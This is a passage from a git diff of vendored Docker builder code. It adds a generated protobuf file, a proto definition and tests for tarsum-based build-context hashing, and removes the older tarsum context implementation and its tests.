path, nil + } + return v.(*fileInfo).sum, nil +} + +// Root returns a root directory for the source +func (cs *CachableSource) Root() containerfs.ContainerFS { + return cs.root +} + +type fileInfo struct { + sum string +} + +func (fi *fileInfo) Hash() string { + return fi.sum +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/tarsum.pb.go b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.pb.go new file mode 100644 index 0000000000..1d23bbe65b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.pb.go @@ -0,0 +1,525 @@ +// Code generated by protoc-gen-gogo. +// source: tarsum.proto +// DO NOT EDIT! + +/* +Package remotecontext is a generated protocol buffer package. + +It is generated from these files: + tarsum.proto + +It has these top-level messages: + TarsumBackup +*/ +package remotecontext + +import proto "github.com/gogo/protobuf/proto" +import fmt "fmt" +import math "math" + +import strings "strings" +import reflect "reflect" +import github_com_gogo_protobuf_sortkeys "github.com/gogo/protobuf/sortkeys" + +import io "io" + +// Reference imports to suppress errors if they are not otherwise used. +var _ = proto.Marshal +var _ = fmt.Errorf +var _ = math.Inf + +// This is a compile-time assertion to ensure that this generated file +// is compatible with the proto package it is being compiled against. +// A compilation error at this line likely means your copy of the +// proto package needs to be updated. 
+const _ = proto.GoGoProtoPackageIsVersion2 // please upgrade the proto package + +type TarsumBackup struct { + Hashes map[string]string `protobuf:"bytes,1,rep,name=Hashes" json:"Hashes,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` +} + +func (m *TarsumBackup) Reset() { *m = TarsumBackup{} } +func (*TarsumBackup) ProtoMessage() {} +func (*TarsumBackup) Descriptor() ([]byte, []int) { return fileDescriptorTarsum, []int{0} } + +func (m *TarsumBackup) GetHashes() map[string]string { + if m != nil { + return m.Hashes + } + return nil +} + +func init() { + proto.RegisterType((*TarsumBackup)(nil), "remotecontext.TarsumBackup") +} +func (this *TarsumBackup) Equal(that interface{}) bool { + if that == nil { + if this == nil { + return true + } + return false + } + + that1, ok := that.(*TarsumBackup) + if !ok { + that2, ok := that.(TarsumBackup) + if ok { + that1 = &that2 + } else { + return false + } + } + if that1 == nil { + if this == nil { + return true + } + return false + } else if this == nil { + return false + } + if len(this.Hashes) != len(that1.Hashes) { + return false + } + for i := range this.Hashes { + if this.Hashes[i] != that1.Hashes[i] { + return false + } + } + return true +} +func (this *TarsumBackup) GoString() string { + if this == nil { + return "nil" + } + s := make([]string, 0, 5) + s = append(s, "&remotecontext.TarsumBackup{") + keysForHashes := make([]string, 0, len(this.Hashes)) + for k := range this.Hashes { + keysForHashes = append(keysForHashes, k) + } + github_com_gogo_protobuf_sortkeys.Strings(keysForHashes) + mapStringForHashes := "map[string]string{" + for _, k := range keysForHashes { + mapStringForHashes += fmt.Sprintf("%#v: %#v,", k, this.Hashes[k]) + } + mapStringForHashes += "}" + if this.Hashes != nil { + s = append(s, "Hashes: "+mapStringForHashes+",\n") + } + s = append(s, "}") + return strings.Join(s, "") +} +func valueToGoStringTarsum(v interface{}, typ string) string { + rv := 
reflect.ValueOf(v) + if rv.IsNil() { + return "nil" + } + pv := reflect.Indirect(rv).Interface() + return fmt.Sprintf("func(v %v) *%v { return &v } ( %#v )", typ, typ, pv) +} +func (m *TarsumBackup) Marshal() (dAtA []byte, err error) { + size := m.Size() + dAtA = make([]byte, size) + n, err := m.MarshalTo(dAtA) + if err != nil { + return nil, err + } + return dAtA[:n], nil +} + +func (m *TarsumBackup) MarshalTo(dAtA []byte) (int, error) { + var i int + _ = i + var l int + _ = l + if len(m.Hashes) > 0 { + for k := range m.Hashes { + dAtA[i] = 0xa + i++ + v := m.Hashes[k] + mapSize := 1 + len(k) + sovTarsum(uint64(len(k))) + 1 + len(v) + sovTarsum(uint64(len(v))) + i = encodeVarintTarsum(dAtA, i, uint64(mapSize)) + dAtA[i] = 0xa + i++ + i = encodeVarintTarsum(dAtA, i, uint64(len(k))) + i += copy(dAtA[i:], k) + dAtA[i] = 0x12 + i++ + i = encodeVarintTarsum(dAtA, i, uint64(len(v))) + i += copy(dAtA[i:], v) + } + } + return i, nil +} + +func encodeFixed64Tarsum(dAtA []byte, offset int, v uint64) int { + dAtA[offset] = uint8(v) + dAtA[offset+1] = uint8(v >> 8) + dAtA[offset+2] = uint8(v >> 16) + dAtA[offset+3] = uint8(v >> 24) + dAtA[offset+4] = uint8(v >> 32) + dAtA[offset+5] = uint8(v >> 40) + dAtA[offset+6] = uint8(v >> 48) + dAtA[offset+7] = uint8(v >> 56) + return offset + 8 +} +func encodeFixed32Tarsum(dAtA []byte, offset int, v uint32) int { + dAtA[offset] = uint8(v) + dAtA[offset+1] = uint8(v >> 8) + dAtA[offset+2] = uint8(v >> 16) + dAtA[offset+3] = uint8(v >> 24) + return offset + 4 +} +func encodeVarintTarsum(dAtA []byte, offset int, v uint64) int { + for v >= 1<<7 { + dAtA[offset] = uint8(v&0x7f | 0x80) + v >>= 7 + offset++ + } + dAtA[offset] = uint8(v) + return offset + 1 +} +func (m *TarsumBackup) Size() (n int) { + var l int + _ = l + if len(m.Hashes) > 0 { + for k, v := range m.Hashes { + _ = k + _ = v + mapEntrySize := 1 + len(k) + sovTarsum(uint64(len(k))) + 1 + len(v) + sovTarsum(uint64(len(v))) + n += mapEntrySize + 1 + sovTarsum(uint64(mapEntrySize)) 
+ } + } + return n +} + +func sovTarsum(x uint64) (n int) { + for { + n++ + x >>= 7 + if x == 0 { + break + } + } + return n +} +func sozTarsum(x uint64) (n int) { + return sovTarsum(uint64((x << 1) ^ uint64((int64(x) >> 63)))) +} +func (this *TarsumBackup) String() string { + if this == nil { + return "nil" + } + keysForHashes := make([]string, 0, len(this.Hashes)) + for k := range this.Hashes { + keysForHashes = append(keysForHashes, k) + } + github_com_gogo_protobuf_sortkeys.Strings(keysForHashes) + mapStringForHashes := "map[string]string{" + for _, k := range keysForHashes { + mapStringForHashes += fmt.Sprintf("%v: %v,", k, this.Hashes[k]) + } + mapStringForHashes += "}" + s := strings.Join([]string{`&TarsumBackup{`, + `Hashes:` + mapStringForHashes + `,`, + `}`, + }, "") + return s +} +func valueToStringTarsum(v interface{}) string { + rv := reflect.ValueOf(v) + if rv.IsNil() { + return "nil" + } + pv := reflect.Indirect(rv).Interface() + return fmt.Sprintf("*%v", pv) +} +func (m *TarsumBackup) Unmarshal(dAtA []byte) error { + l := len(dAtA) + iNdEx := 0 + for iNdEx < l { + preIndex := iNdEx + var wire uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowTarsum + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + wire |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + fieldNum := int32(wire >> 3) + wireType := int(wire & 0x7) + if wireType == 4 { + return fmt.Errorf("proto: TarsumBackup: wiretype end group for non-group") + } + if fieldNum <= 0 { + return fmt.Errorf("proto: TarsumBackup: illegal tag %d (wire type %d)", fieldNum, wire) + } + switch fieldNum { + case 1: + if wireType != 2 { + return fmt.Errorf("proto: wrong wireType = %d for field Hashes", wireType) + } + var msglen int + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowTarsum + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + msglen |= (int(b) & 
0x7F) << shift + if b < 0x80 { + break + } + } + if msglen < 0 { + return ErrInvalidLengthTarsum + } + postIndex := iNdEx + msglen + if postIndex > l { + return io.ErrUnexpectedEOF + } + var keykey uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowTarsum + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + keykey |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + var stringLenmapkey uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowTarsum + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLenmapkey |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + intStringLenmapkey := int(stringLenmapkey) + if intStringLenmapkey < 0 { + return ErrInvalidLengthTarsum + } + postStringIndexmapkey := iNdEx + intStringLenmapkey + if postStringIndexmapkey > l { + return io.ErrUnexpectedEOF + } + mapkey := string(dAtA[iNdEx:postStringIndexmapkey]) + iNdEx = postStringIndexmapkey + if m.Hashes == nil { + m.Hashes = make(map[string]string) + } + if iNdEx < postIndex { + var valuekey uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowTarsum + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + valuekey |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + var stringLenmapvalue uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowTarsum + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLenmapvalue |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + intStringLenmapvalue := int(stringLenmapvalue) + if intStringLenmapvalue < 0 { + return ErrInvalidLengthTarsum + } + postStringIndexmapvalue := iNdEx + intStringLenmapvalue + if postStringIndexmapvalue > l { + return io.ErrUnexpectedEOF + } + mapvalue := string(dAtA[iNdEx:postStringIndexmapvalue]) + iNdEx 
= postStringIndexmapvalue + m.Hashes[mapkey] = mapvalue + } else { + var mapvalue string + m.Hashes[mapkey] = mapvalue + } + iNdEx = postIndex + default: + iNdEx = preIndex + skippy, err := skipTarsum(dAtA[iNdEx:]) + if err != nil { + return err + } + if skippy < 0 { + return ErrInvalidLengthTarsum + } + if (iNdEx + skippy) > l { + return io.ErrUnexpectedEOF + } + iNdEx += skippy + } + } + + if iNdEx > l { + return io.ErrUnexpectedEOF + } + return nil +} +func skipTarsum(dAtA []byte) (n int, err error) { + l := len(dAtA) + iNdEx := 0 + for iNdEx < l { + var wire uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return 0, ErrIntOverflowTarsum + } + if iNdEx >= l { + return 0, io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + wire |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + wireType := int(wire & 0x7) + switch wireType { + case 0: + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return 0, ErrIntOverflowTarsum + } + if iNdEx >= l { + return 0, io.ErrUnexpectedEOF + } + iNdEx++ + if dAtA[iNdEx-1] < 0x80 { + break + } + } + return iNdEx, nil + case 1: + iNdEx += 8 + return iNdEx, nil + case 2: + var length int + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return 0, ErrIntOverflowTarsum + } + if iNdEx >= l { + return 0, io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + length |= (int(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + iNdEx += length + if length < 0 { + return 0, ErrInvalidLengthTarsum + } + return iNdEx, nil + case 3: + for { + var innerWire uint64 + var start int = iNdEx + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return 0, ErrIntOverflowTarsum + } + if iNdEx >= l { + return 0, io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + innerWire |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + innerWireType := int(innerWire & 0x7) + if innerWireType == 4 { + break + } + next, err := skipTarsum(dAtA[start:]) + if err != nil { + return 0, err + } + 
iNdEx = start + next + } + return iNdEx, nil + case 4: + return iNdEx, nil + case 5: + iNdEx += 4 + return iNdEx, nil + default: + return 0, fmt.Errorf("proto: illegal wireType %d", wireType) + } + } + panic("unreachable") +} + +var ( + ErrInvalidLengthTarsum = fmt.Errorf("proto: negative length found during unmarshaling") + ErrIntOverflowTarsum = fmt.Errorf("proto: integer overflow") +) + +func init() { proto.RegisterFile("tarsum.proto", fileDescriptorTarsum) } + +var fileDescriptorTarsum = []byte{ + // 196 bytes of a gzipped FileDescriptorProto + 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x09, 0x6e, 0x88, 0x02, 0xff, 0xe2, 0xe2, 0x29, 0x49, 0x2c, 0x2a, + 0x2e, 0xcd, 0xd5, 0x2b, 0x28, 0xca, 0x2f, 0xc9, 0x17, 0xe2, 0x2d, 0x4a, 0xcd, 0xcd, 0x2f, 0x49, + 0x4d, 0xce, 0xcf, 0x2b, 0x49, 0xad, 0x28, 0x51, 0xea, 0x62, 0xe4, 0xe2, 0x09, 0x01, 0xcb, 0x3b, + 0x25, 0x26, 0x67, 0x97, 0x16, 0x08, 0xd9, 0x73, 0xb1, 0x79, 0x24, 0x16, 0x67, 0xa4, 0x16, 0x4b, + 0x30, 0x2a, 0x30, 0x6b, 0x70, 0x1b, 0xa9, 0xeb, 0xa1, 0x68, 0xd0, 0x43, 0x56, 0xac, 0x07, 0x51, + 0xe9, 0x9a, 0x57, 0x52, 0x54, 0x19, 0x04, 0xd5, 0x26, 0x65, 0xc9, 0xc5, 0x8d, 0x24, 0x2c, 0x24, + 0xc0, 0xc5, 0x9c, 0x9d, 0x5a, 0x29, 0xc1, 0xa8, 0xc0, 0xa8, 0xc1, 0x19, 0x04, 0x62, 0x0a, 0x89, + 0x70, 0xb1, 0x96, 0x25, 0xe6, 0x94, 0xa6, 0x4a, 0x30, 0x81, 0xc5, 0x20, 0x1c, 0x2b, 0x26, 0x0b, + 0x46, 0x27, 0x9d, 0x0b, 0x0f, 0xe5, 0x18, 0x6e, 0x3c, 0x94, 0x63, 0xf8, 0xf0, 0x50, 0x8e, 0xb1, + 0xe1, 0x91, 0x1c, 0xe3, 0x8a, 0x47, 0x72, 0x8c, 0x27, 0x1e, 0xc9, 0x31, 0x5e, 0x78, 0x24, 0xc7, + 0xf8, 0xe0, 0x91, 0x1c, 0xe3, 0x8b, 0x47, 0x72, 0x0c, 0x1f, 0x1e, 0xc9, 0x31, 0x4e, 0x78, 0x2c, + 0xc7, 0x90, 0xc4, 0x06, 0xf6, 0x90, 0x31, 0x20, 0x00, 0x00, 0xff, 0xff, 0x89, 0x57, 0x7d, 0x3f, + 0xe0, 0x00, 0x00, 0x00, +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/tarsum.proto b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.proto new file mode 100644 index 0000000000..cb94240ba8 --- /dev/null +++ 
b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.proto @@ -0,0 +1,7 @@ +syntax = "proto3"; + +package remotecontext; // no namespace because only used internally + +message TarsumBackup { + map Hashes = 1; +} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/remotecontext/tarsum_test.go b/vendor/github.com/docker/docker/builder/remotecontext/tarsum_test.go new file mode 100644 index 0000000000..46f128d9f0 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/tarsum_test.go @@ -0,0 +1,151 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/docker/docker/builder" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" + "github.com/pkg/errors" + "gotest.tools/skip" +) + +const ( + filename = "test" + contents = "contents test" +) + +func init() { + reexec.Init() +} + +func TestCloseRootDirectory(t *testing.T) { + contextDir, err := ioutil.TempDir("", "builder-tarsum-test") + defer os.RemoveAll(contextDir) + if err != nil { + t.Fatalf("Error with creating temporary directory: %s", err) + } + + src := makeTestArchiveContext(t, contextDir) + err = src.Close() + + if err != nil { + t.Fatalf("Error while executing Close: %s", err) + } + + _, err = os.Stat(src.Root().Path()) + + if !os.IsNotExist(err) { + t.Fatal("Directory should not exist at this point") + } +} + +func TestHashFile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + createTestTempFile(t, contextDir, filename, contents, 0755) + + tarSum := makeTestArchiveContext(t, contextDir) + + sum, err := tarSum.Hash(filename) + + if err != nil { + t.Fatalf("Error when executing Stat: %s", err) + } + + if len(sum) == 0 { + t.Fatalf("Hash returned empty sum") + } + + expected := "1149ab94af7be6cc1da1335e398f24ee1cf4926b720044d229969dfc248ae7ec" + + if actual := 
sum; expected != actual { + t.Fatalf("invalid checksum. expected %s, got %s", expected, actual) + } +} + +func TestHashSubdir(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + contextSubdir := filepath.Join(contextDir, "builder-tarsum-test-subdir") + err := os.Mkdir(contextSubdir, 0755) + if err != nil { + t.Fatalf("Failed to make directory: %s", contextSubdir) + } + + testFilename := createTestTempFile(t, contextSubdir, filename, contents, 0755) + + tarSum := makeTestArchiveContext(t, contextDir) + + relativePath, err := filepath.Rel(contextDir, testFilename) + + if err != nil { + t.Fatalf("Error when getting relative path: %s", err) + } + + sum, err := tarSum.Hash(relativePath) + + if err != nil { + t.Fatalf("Error when executing Stat: %s", err) + } + + if len(sum) == 0 { + t.Fatalf("Hash returned empty sum") + } + + expected := "d7f8d6353dee4816f9134f4156bf6a9d470fdadfb5d89213721f7e86744a4e69" + + if actual := sum; expected != actual { + t.Fatalf("invalid checksum. 
expected %s, got %s", expected, actual) + } +} + +func TestRemoveDirectory(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") + + relativePath, err := filepath.Rel(contextDir, contextSubdir) + + if err != nil { + t.Fatalf("Error when getting relative path: %s", err) + } + + src := makeTestArchiveContext(t, contextDir) + + _, err = src.Root().Stat(src.Root().Join(src.Root().Path(), relativePath)) + if err != nil { + t.Fatalf("Statting %s shouldn't fail: %+v", relativePath, err) + } + + tarSum := src.(modifiableContext) + err = tarSum.Remove(relativePath) + if err != nil { + t.Fatalf("Error when executing Remove: %s", err) + } + + _, err = src.Root().Stat(src.Root().Join(src.Root().Path(), relativePath)) + if !os.IsNotExist(errors.Cause(err)) { + t.Fatalf("Directory should not exist at this point: %+v ", err) + } +} + +func makeTestArchiveContext(t *testing.T, dir string) builder.Source { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + tarStream, err := archive.Tar(dir, archive.Uncompressed) + if err != nil { + t.Fatalf("error: %s", err) + } + defer tarStream.Close() + tarSum, err := FromArchive(tarStream) + if err != nil { + t.Fatalf("Error when executing FromArchive: %s", err) + } + return tarSum +} diff --git a/vendor/github.com/docker/docker/builder/utils_test.go b/vendor/github.com/docker/docker/builder/remotecontext/utils_test.go similarity index 66% rename from vendor/github.com/docker/docker/builder/utils_test.go rename to vendor/github.com/docker/docker/builder/remotecontext/utils_test.go index 1101ff1d1d..6a4c707a6e 100644 --- a/vendor/github.com/docker/docker/builder/utils_test.go +++ b/vendor/github.com/docker/docker/builder/remotecontext/utils_test.go @@ -1,4 +1,4 @@ -package builder +package remotecontext // import "github.com/docker/docker/builder/remotecontext" import ( "io/ioutil" @@ -7,12 
+7,6 @@ import ( "testing" ) -const ( - dockerfileContents = "FROM busybox" - dockerignoreFilename = ".dockerignore" - testfileContents = "test" -) - // createTestTempDir creates a temporary directory for testing. // It returns the created path and a cleanup function which is meant to be used as deferred call. // When an error occurs, it terminates the test. @@ -59,29 +53,3 @@ func createTestTempFile(t *testing.T, dir, filename, contents string, perm os.Fi return filePath } - -// chdir changes current working directory to dir. -// It returns a function which changes working directory back to the previous one. -// This function is meant to be executed as a deferred call. -// When an error occurs, it terminates the test. -func chdir(t *testing.T, dir string) func() { - workingDirectory, err := os.Getwd() - - if err != nil { - t.Fatalf("Error when retrieving working directory: %s", err) - } - - err = os.Chdir(dir) - - if err != nil { - t.Fatalf("Error when changing directory to %s: %s", dir, err) - } - - return func() { - err = os.Chdir(workingDirectory) - - if err != nil { - t.Fatalf("Error when changing back to working directory (%s): %s", workingDirectory, err) - } - } -} diff --git a/vendor/github.com/docker/docker/builder/tarsum.go b/vendor/github.com/docker/docker/builder/tarsum.go deleted file mode 100644 index 35054dcba1..0000000000 --- a/vendor/github.com/docker/docker/builder/tarsum.go +++ /dev/null @@ -1,158 +0,0 @@ -package builder - -import ( - "fmt" - "io" - "os" - "path/filepath" - - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/chrootarchive" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/symlink" - "github.com/docker/docker/pkg/tarsum" -) - -type tarSumContext struct { - root string - sums tarsum.FileInfoSums -} - -func (c *tarSumContext) Close() error { - return os.RemoveAll(c.root) -} - -func convertPathError(err error, cleanpath string) error { - if err, ok := err.(*os.PathError); ok { - err.Path = 
cleanpath - return err - } - return err -} - -func (c *tarSumContext) Open(path string) (io.ReadCloser, error) { - cleanpath, fullpath, err := c.normalize(path) - if err != nil { - return nil, err - } - r, err := os.Open(fullpath) - if err != nil { - return nil, convertPathError(err, cleanpath) - } - return r, nil -} - -func (c *tarSumContext) Stat(path string) (string, FileInfo, error) { - cleanpath, fullpath, err := c.normalize(path) - if err != nil { - return "", nil, err - } - - st, err := os.Lstat(fullpath) - if err != nil { - return "", nil, convertPathError(err, cleanpath) - } - - rel, err := filepath.Rel(c.root, fullpath) - if err != nil { - return "", nil, convertPathError(err, cleanpath) - } - - // We set sum to path by default for the case where GetFile returns nil. - // The usual case is if relative path is empty. - sum := path - // Use the checksum of the followed path(not the possible symlink) because - // this is the file that is actually copied. - if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil { - sum = tsInfo.Sum() - } - fi := &HashedFileInfo{PathFileInfo{st, fullpath, filepath.Base(cleanpath)}, sum} - return rel, fi, nil -} - -// MakeTarSumContext returns a build Context from a tar stream. -// -// It extracts the tar stream to a temporary folder that is deleted as soon as -// the Context is closed. -// As the extraction happens, a tarsum is calculated for every file, and the set of -// all those sums then becomes the source of truth for all operations on this Context. -// -// Closing tarStream has to be done by the caller. -func MakeTarSumContext(tarStream io.Reader) (ModifiableContext, error) { - root, err := ioutils.TempDir("", "docker-builder") - if err != nil { - return nil, err - } - - tsc := &tarSumContext{root: root} - - // Make sure we clean-up upon error. 
In the happy case the caller - // is expected to manage the clean-up - defer func() { - if err != nil { - tsc.Close() - } - }() - - decompressedStream, err := archive.DecompressStream(tarStream) - if err != nil { - return nil, err - } - - sum, err := tarsum.NewTarSum(decompressedStream, true, tarsum.Version1) - if err != nil { - return nil, err - } - - if err := chrootarchive.Untar(sum, root, nil); err != nil { - return nil, err - } - - tsc.sums = sum.GetSums() - - return tsc, nil -} - -func (c *tarSumContext) normalize(path string) (cleanpath, fullpath string, err error) { - cleanpath = filepath.Clean(string(os.PathSeparator) + path)[1:] - fullpath, err = symlink.FollowSymlinkInScope(filepath.Join(c.root, path), c.root) - if err != nil { - return "", "", fmt.Errorf("Forbidden path outside the build context: %s (%s)", path, fullpath) - } - _, err = os.Lstat(fullpath) - if err != nil { - return "", "", convertPathError(err, path) - } - return -} - -func (c *tarSumContext) Walk(root string, walkFn WalkFunc) error { - root = filepath.Join(c.root, filepath.Join(string(filepath.Separator), root)) - return filepath.Walk(root, func(fullpath string, info os.FileInfo, err error) error { - rel, err := filepath.Rel(c.root, fullpath) - if err != nil { - return err - } - if rel == "." 
{ - return nil - } - - sum := rel - if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil { - sum = tsInfo.Sum() - } - fi := &HashedFileInfo{PathFileInfo{FileInfo: info, FilePath: fullpath}, sum} - if err := walkFn(rel, fi, nil); err != nil { - return err - } - return nil - }) -} - -func (c *tarSumContext) Remove(path string) error { - _, fullpath, err := c.normalize(path) - if err != nil { - return err - } - return os.RemoveAll(fullpath) -} diff --git a/vendor/github.com/docker/docker/builder/tarsum_test.go b/vendor/github.com/docker/docker/builder/tarsum_test.go deleted file mode 100644 index 278e5830de..0000000000 --- a/vendor/github.com/docker/docker/builder/tarsum_test.go +++ /dev/null @@ -1,265 +0,0 @@ -package builder - -import ( - "bufio" - "bytes" - "io/ioutil" - "os" - "path/filepath" - "testing" - - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/reexec" -) - -const ( - filename = "test" - contents = "contents test" -) - -func init() { - reexec.Init() -} - -func TestCloseRootDirectory(t *testing.T) { - contextDir, err := ioutil.TempDir("", "builder-tarsum-test") - - if err != nil { - t.Fatalf("Error with creating temporary directory: %s", err) - } - - tarsum := &tarSumContext{root: contextDir} - - err = tarsum.Close() - - if err != nil { - t.Fatalf("Error while executing Close: %s", err) - } - - _, err = os.Stat(contextDir) - - if !os.IsNotExist(err) { - t.Fatalf("Directory should not exist at this point") - defer os.RemoveAll(contextDir) - } -} - -func TestOpenFile(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - createTestTempFile(t, contextDir, filename, contents, 0777) - - tarSum := &tarSumContext{root: contextDir} - - file, err := tarSum.Open(filename) - - if err != nil { - t.Fatalf("Error when executing Open: %s", err) - } - - defer file.Close() - - scanner := bufio.NewScanner(file) - buff := bytes.NewBufferString("") - - for scanner.Scan() { - 
buff.WriteString(scanner.Text()) - } - - if contents != buff.String() { - t.Fatalf("Contents are not equal. Expected: %s, got: %s", contents, buff.String()) - } - -} - -func TestOpenNotExisting(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - tarSum := &tarSumContext{root: contextDir} - - file, err := tarSum.Open("not-existing") - - if file != nil { - t.Fatal("Opened file should be nil") - } - - if !os.IsNotExist(err) { - t.Fatalf("Error when executing Open: %s", err) - } -} - -func TestStatFile(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - testFilename := createTestTempFile(t, contextDir, filename, contents, 0777) - - tarSum := &tarSumContext{root: contextDir} - - relPath, fileInfo, err := tarSum.Stat(filename) - - if err != nil { - t.Fatalf("Error when executing Stat: %s", err) - } - - if relPath != filename { - t.Fatalf("Relative path should be equal to %s, got %s", filename, relPath) - } - - if fileInfo.Path() != testFilename { - t.Fatalf("Full path should be equal to %s, got %s", testFilename, fileInfo.Path()) - } -} - -func TestStatSubdir(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") - - testFilename := createTestTempFile(t, contextSubdir, filename, contents, 0777) - - tarSum := &tarSumContext{root: contextDir} - - relativePath, err := filepath.Rel(contextDir, testFilename) - - if err != nil { - t.Fatalf("Error when getting relative path: %s", err) - } - - relPath, fileInfo, err := tarSum.Stat(relativePath) - - if err != nil { - t.Fatalf("Error when executing Stat: %s", err) - } - - if relPath != relativePath { - t.Fatalf("Relative path should be equal to %s, got %s", relativePath, relPath) - } - - if fileInfo.Path() != testFilename { - t.Fatalf("Full path should be equal to %s, got %s", 
testFilename, fileInfo.Path()) - } -} - -func TestStatNotExisting(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - tarSum := &tarSumContext{root: contextDir} - - relPath, fileInfo, err := tarSum.Stat("not-existing") - - if relPath != "" { - t.Fatal("Relative path should be nil") - } - - if fileInfo != nil { - t.Fatalf("File info should be nil") - } - - if !os.IsNotExist(err) { - t.Fatalf("This file should not exist: %s", err) - } -} - -func TestRemoveDirectory(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") - - relativePath, err := filepath.Rel(contextDir, contextSubdir) - - if err != nil { - t.Fatalf("Error when getting relative path: %s", err) - } - - tarSum := &tarSumContext{root: contextDir} - - err = tarSum.Remove(relativePath) - - if err != nil { - t.Fatalf("Error when executing Remove: %s", err) - } - - _, err = os.Stat(contextSubdir) - - if !os.IsNotExist(err) { - t.Fatalf("Directory should not exist at this point") - } -} - -func TestMakeTarSumContext(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - createTestTempFile(t, contextDir, filename, contents, 0777) - - tarStream, err := archive.Tar(contextDir, archive.Uncompressed) - - if err != nil { - t.Fatalf("error: %s", err) - } - - defer tarStream.Close() - - tarSum, err := MakeTarSumContext(tarStream) - - if err != nil { - t.Fatalf("Error when executing MakeTarSumContext: %s", err) - } - - if tarSum == nil { - t.Fatalf("Tar sum context should not be nil") - } -} - -func TestWalkWithoutError(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") - - createTestTempFile(t, contextSubdir, filename, contents, 
0777) - - tarSum := &tarSumContext{root: contextDir} - - walkFun := func(path string, fi FileInfo, err error) error { - return nil - } - - err := tarSum.Walk(contextSubdir, walkFun) - - if err != nil { - t.Fatalf("Error when executing Walk: %s", err) - } -} - -type WalkError struct { -} - -func (we WalkError) Error() string { - return "Error when executing Walk" -} - -func TestWalkWithError(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") - - tarSum := &tarSumContext{root: contextDir} - - walkFun := func(path string, fi FileInfo, err error) error { - return WalkError{} - } - - err := tarSum.Walk(contextSubdir, walkFun) - - if err == nil { - t.Fatalf("Error should not be nil") - } -} diff --git a/vendor/github.com/docker/docker/cli/cobra.go b/vendor/github.com/docker/docker/cli/cobra.go index 139845cb1b..8ed1fddc06 100644 --- a/vendor/github.com/docker/docker/cli/cobra.go +++ 